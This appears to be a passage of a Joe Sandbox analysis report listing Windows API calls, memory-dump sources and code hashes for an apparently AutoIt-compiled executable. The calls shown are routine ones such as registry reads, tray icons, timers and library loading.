                                                                                                                                        • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00B23B0F,SwapMouseButtons,00000004,?), ref: 00B23B40
                                                                                                                                        • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00B23B0F,SwapMouseButtons,00000004,?), ref: 00B23B61
                                                                                                                                        • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00B23B0F,SwapMouseButtons,00000004,?), ref: 00B23B83
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseOpenQueryValue
                                                                                                                                        • String ID: Control Panel\Mouse
                                                                                                                                        • API String ID: 3677997916-824357125
                                                                                                                                        • Opcode ID: fbc7f5389ef4c4195b0239840c30505db9f3db67e4f788f3c9b323f5be0182b0
                                                                                                                                        • Instruction ID: b8c780ca32694e6940fd7456456d544a1daae6eb13cf4065fc2d1381c3d369b5
                                                                                                                                        • Opcode Fuzzy Hash: fbc7f5389ef4c4195b0239840c30505db9f3db67e4f788f3c9b323f5be0182b0
                                                                                                                                        • Instruction Fuzzy Hash: 55112AB5511218FFDB21CFA5EC88AAEBBF8EF04B44B104999B809D7110D6759E409B60

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00B633A2
                                                                                                                                          • Part of subcall function 00B26B57: _wcslen.LIBCMT ref: 00B26B6A
                                                                                                                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00B23A04
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: IconLoadNotifyShell_String_wcslen
                                                                                                                                        • String ID: Line:
                                                                                                                                        • API String ID: 2289894680-1585850449
                                                                                                                                        • Opcode ID: 4b97e1355ecd63a7748b3475c9f2739a5af4e71d8726dc4cbb449b0ab9b16b56
                                                                                                                                        • Instruction ID: c976a8199005fff9a247ed56ec52ee0899aa752c490b4cb200b8dfccdc8c0e59
                                                                                                                                        • Opcode Fuzzy Hash: 4b97e1355ecd63a7748b3475c9f2739a5af4e71d8726dc4cbb449b0ab9b16b56
                                                                                                                                        • Instruction Fuzzy Hash: 6031E271508324AAC725EB24EC45BEBB7D8AB45B10F040EAAF59D83191DF749A48CBC6
                                                                                                                                        APIs
                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00B40668
                                                                                                                                          • Part of subcall function 00B432A4: RaiseException.KERNEL32(?,?,?,00B4068A,?,00BF1444,?,?,?,?,?,?,00B4068A,00B21129,00BE8738,00B21129), ref: 00B43304
                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00B40685
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                        • String ID: Unknown exception
                                                                                                                                        • API String ID: 3476068407-410509341
                                                                                                                                        • Opcode ID: db4797ce34f84c9c50aa2962325e8cc3637631e6ee2e5e790ed14728dad39ba9
                                                                                                                                        • Instruction ID: f0847adac62ef8f3b507c5656beaeb17f21d00519867e6943b57804659491ee6
                                                                                                                                        • Opcode Fuzzy Hash: db4797ce34f84c9c50aa2962325e8cc3637631e6ee2e5e790ed14728dad39ba9
                                                                                                                                        • Instruction Fuzzy Hash: 1DF0C83490060D778B00B668D88ACAD77FC9E50310B7045F1B914955A1EF71DB25E580
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00B21BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00B21BF4
                                                                                                                                          • Part of subcall function 00B21BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00B21BFC
                                                                                                                                          • Part of subcall function 00B21BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00B21C07
                                                                                                                                          • Part of subcall function 00B21BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00B21C12
                                                                                                                                          • Part of subcall function 00B21BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00B21C1A
                                                                                                                                          • Part of subcall function 00B21BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00B21C22
                                                                                                                                          • Part of subcall function 00B21B4A: RegisterWindowMessageW.USER32(00000004,?,00B212C4), ref: 00B21BA2
                                                                                                                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00B2136A
                                                                                                                                        • OleInitialize.OLE32 ref: 00B21388
                                                                                                                                        • CloseHandle.KERNEL32(00000000,00000000), ref: 00B624AB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1986988660-0
                                                                                                                                        • Opcode ID: 0e768a9211086463d9cca150087b5dac704283fe917a441a2fbf1443c6cfcb5a
                                                                                                                                        • Instruction ID: bef8eefb809233ffe4fff5d2757778f578047447a806af2ab998e27502946210
                                                                                                                                        • Opcode Fuzzy Hash: 0e768a9211086463d9cca150087b5dac704283fe917a441a2fbf1443c6cfcb5a
                                                                                                                                        • Instruction Fuzzy Hash: 6871C9B5911204CFD384EF7EAD456B53AE4FBA87847548EAAD10ADB361EF318448CF50
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00B23923: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00B23A04
                                                                                                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00B8C259
                                                                                                                                        • KillTimer.USER32(?,00000001,?,?), ref: 00B8C261
                                                                                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00B8C270
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: IconNotifyShell_Timer$Kill
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3500052701-0
                                                                                                                                        • Opcode ID: 15127be3e496c4580750136a3a8756b95f2c8f343852c33407e24437aeffa0ec
                                                                                                                                        • Instruction ID: 9a75c31854197ddf01a983da374448a6582027ec6eac3c52b79e5374c25ea215
                                                                                                                                        • Opcode Fuzzy Hash: 15127be3e496c4580750136a3a8756b95f2c8f343852c33407e24437aeffa0ec
                                                                                                                                        • Instruction Fuzzy Hash: 2B3193B0904354AFEB62EF648895BE7BFEC9B06304F0004DAE5DAA7291C7745A84CB61
                                                                                                                                        APIs
                                                                                                                                        • CloseHandle.KERNELBASE(00000000,00000000,?,?,00B585CC,?,00BE8CC8,0000000C), ref: 00B58704
                                                                                                                                        • GetLastError.KERNEL32(?,00B585CC,?,00BE8CC8,0000000C), ref: 00B5870E
                                                                                                                                        • __dosmaperr.LIBCMT ref: 00B58739
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2583163307-0
                                                                                                                                        • Opcode ID: d92ad4a379466c25815da0aceb452b1494af44bb25c7f8a2db6ab3acb52145a3
                                                                                                                                        • Instruction ID: efc3ba7fc7926c36d37bf5da5687600b3ac1e9f68addc684023b9f2bb1aa1a49
                                                                                                                                        • Opcode Fuzzy Hash: d92ad4a379466c25815da0aceb452b1494af44bb25c7f8a2db6ab3acb52145a3
                                                                                                                                        • Instruction Fuzzy Hash: C5016B32A1526017D3707234A84577E2BC98F81777F3902D9FC09AB0E2DEB0CC89C154
                                                                                                                                        APIs
                                                                                                                                        • TranslateMessage.USER32(?), ref: 00B2DB7B
                                                                                                                                        • DispatchMessageW.USER32(?), ref: 00B2DB89
                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B2DB9F
                                                                                                                                        • Sleep.KERNELBASE(0000000A), ref: 00B2DBB1
                                                                                                                                        • TranslateAcceleratorW.USER32(?,?,?), ref: 00B71CC9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3288985973-0
                                                                                                                                        • Opcode ID: 4207eb48865f2a47d43eb81a1381559ac7943de7a0aeac965a8db6ebfd3881f2
                                                                                                                                        • Instruction ID: 44c6adf7c09dbbef791393568945e23bdb20e044faf5bad580ef21ac30696db7
                                                                                                                                        • Opcode Fuzzy Hash: 4207eb48865f2a47d43eb81a1381559ac7943de7a0aeac965a8db6ebfd3881f2
                                                                                                                                        • Instruction Fuzzy Hash: 44F0DA316443449BE730CBA59C99FAA77E8EB45350F104A59E65E870D0DF7094488B25
                                                                                                                                        APIs
                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 00B317F6
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Init_thread_footer
                                                                                                                                        • String ID: CALL
                                                                                                                                        • API String ID: 1385522511-4196123274
                                                                                                                                        • Opcode ID: f91ad1c6f15a4015b087bf02cc5b91420f395491df04d3bdb37adc0706cd0a8c
                                                                                                                                        • Instruction ID: feb358d4131f729fb53d071c69202b4186f0e75a3b373ddc43ba7b122ffd42ed
                                                                                                                                        • Opcode Fuzzy Hash: f91ad1c6f15a4015b087bf02cc5b91420f395491df04d3bdb37adc0706cd0a8c
                                                                                                                                        • Instruction Fuzzy Hash: 15228B70608201DFC714DF18C490A2ABBF5FF99314F2989ADF49A8B361D731E945CB92
                                                                                                                                        APIs
                                                                                                                                        • GetOpenFileNameW.COMDLG32(?), ref: 00B62C8C
                                                                                                                                          • Part of subcall function 00B23AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B23A97,?,?,00B22E7F,?,?,?,00000000), ref: 00B23AC2
                                                                                                                                          • Part of subcall function 00B22DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00B22DC4
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Name$Path$FileFullLongOpen
                                                                                                                                        • String ID: X
                                                                                                                                        • API String ID: 779396738-3081909835
                                                                                                                                        • Opcode ID: e0ec388c6e28d4321f4327deb0ccb2a9bd5748ffe36c1f4eb7ed6fb35b1542a2
                                                                                                                                        • Instruction ID: 52a1ad266e7a97767776bd3bac6db426645f8b52b8dfc762e778ab5aa6fb2daa
                                                                                                                                        • Opcode Fuzzy Hash: e0ec388c6e28d4321f4327deb0ccb2a9bd5748ffe36c1f4eb7ed6fb35b1542a2
                                                                                                                                        • Instruction Fuzzy Hash: C821D571A102A8AFDB01EF94D845BEE7BF8EF58314F004099E409F7241DBB85A498FA1
                                                                                                                                        APIs
                                                                                                                                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00B23908
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: IconNotifyShell_
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1144537725-0
                                                                                                                                        • Opcode ID: 830859ff2f3fc70297003abdd17121f80f712c56c21ec1d506452879f2defafb
                                                                                                                                        • Instruction ID: 22da73de5935aa84da1ac33a8d1ce0e33240f358960275e4b03fdb9118414474
                                                                                                                                        • Opcode Fuzzy Hash: 830859ff2f3fc70297003abdd17121f80f712c56c21ec1d506452879f2defafb
                                                                                                                                        • Instruction Fuzzy Hash: 79318170604311DFD720DF24D8847A7BBE4FB49708F000D6EF59A8B250EB75AA44CB56
                                                                                                                                        APIs
                                                                                                                                        • timeGetTime.WINMM ref: 00B3F661
                                                                                                                                          • Part of subcall function 00B2D730: GetInputState.USER32 ref: 00B2D807
                                                                                                                                        • Sleep.KERNEL32(00000000), ref: 00B7F2DE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InputSleepStateTimetime
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4149333218-0
                                                                                                                                        • Opcode ID: 1859c011fe6be7dbe679a6b93e315f07156f13adc2e5372749f2f239cbbaf060
                                                                                                                                        • Instruction ID: 4c519da10972c88bf4ee124bb2752723ca4cbe9289c749fdfe60cc8005be3dc3
                                                                                                                                        • Opcode Fuzzy Hash: 1859c011fe6be7dbe679a6b93e315f07156f13adc2e5372749f2f239cbbaf060
                                                                                                                                        • Instruction Fuzzy Hash: 1FF08C31240615AFD310EF69E459F6ABBE8EF59760F0041AAE85DDB261DFB0AC00CB90
                                                                                                                                        APIs
                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 00B2BB4E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Init_thread_footer
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1385522511-0
                                                                                                                                        • Opcode ID: 87495355e5bdc08f593e1304f8ddbc95cb025c5cdf05474f13020d087cb4b1c2
                                                                                                                                        • Instruction ID: 77fe6d321b184b9711b81bf631612cf356d0a6a2defbb5274c2ec4c15d43fabc
                                                                                                                                        • Opcode Fuzzy Hash: 87495355e5bdc08f593e1304f8ddbc95cb025c5cdf05474f13020d087cb4b1c2
                                                                                                                                        • Instruction Fuzzy Hash: 6232BC75A00229DFDB20DF54D894EBEB7F5EF48300F1580DAE919AB261CB74AD81CB91
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00B24E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00B24EDD,?,00BF1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00B24E9C
                                                                                                                                          • Part of subcall function 00B24E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00B24EAE
                                                                                                                                          • Part of subcall function 00B24E90: FreeLibrary.KERNEL32(00000000,?,?,00B24EDD,?,00BF1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00B24EC0
                                                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00BF1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00B24EFD
                                                                                                                                          • Part of subcall function 00B24E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00B63CDE,?,00BF1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00B24E62
                                                                                                                                          • Part of subcall function 00B24E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00B24E74
                                                                                                                                          • Part of subcall function 00B24E59: FreeLibrary.KERNEL32(00000000,?,?,00B63CDE,?,00BF1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00B24E87
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Library$Load$AddressFreeProc
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2632591731-0
                                                                                                                                        • Opcode ID: cf75a42b0093d765db6eb258d9ab3d2a283da25f9661731846803bf687a3cf35
                                                                                                                                        • Instruction ID: 85b4fbb56d7efa432463659a55970706639b0fd4a0c162924952ad5806171dd6
                                                                                                                                        • Opcode Fuzzy Hash: cf75a42b0093d765db6eb258d9ab3d2a283da25f9661731846803bf687a3cf35
                                                                                                                                        • Instruction Fuzzy Hash: C2110431610215AADF24FB60ED02FED7BE4AF90B10F2044A9F54AA65C1DFB09A049B50
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __wsopen_s
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3347428461-0
                                                                                                                                        • Opcode ID: e32a7e1cd44626ca5b9dcc6de153a5dd0bf42576d48063e8026bf04228592e92
                                                                                                                                        • Instruction ID: adb42359fb049a1fa3f2d8fc62a0205847a06c39d6a23ba8b8555180b4e53f3a
                                                                                                                                        • Opcode Fuzzy Hash: e32a7e1cd44626ca5b9dcc6de153a5dd0bf42576d48063e8026bf04228592e92
                                                                                                                                        • Instruction Fuzzy Hash: 4D11187590410AAFCB05DF58E941A9A7BF9EF48315F104099FC09AB312DA31DA15CBA5
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00B54C7D: RtlAllocateHeap.NTDLL(00000008,00B21129,00000000,?,00B52E29,00000001,00000364,?,?,?,00B4F2DE,00B53863,00BF1444,?,00B3FDF5,?), ref: 00B54CBE
                                                                                                                                        • _free.LIBCMT ref: 00B5506C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
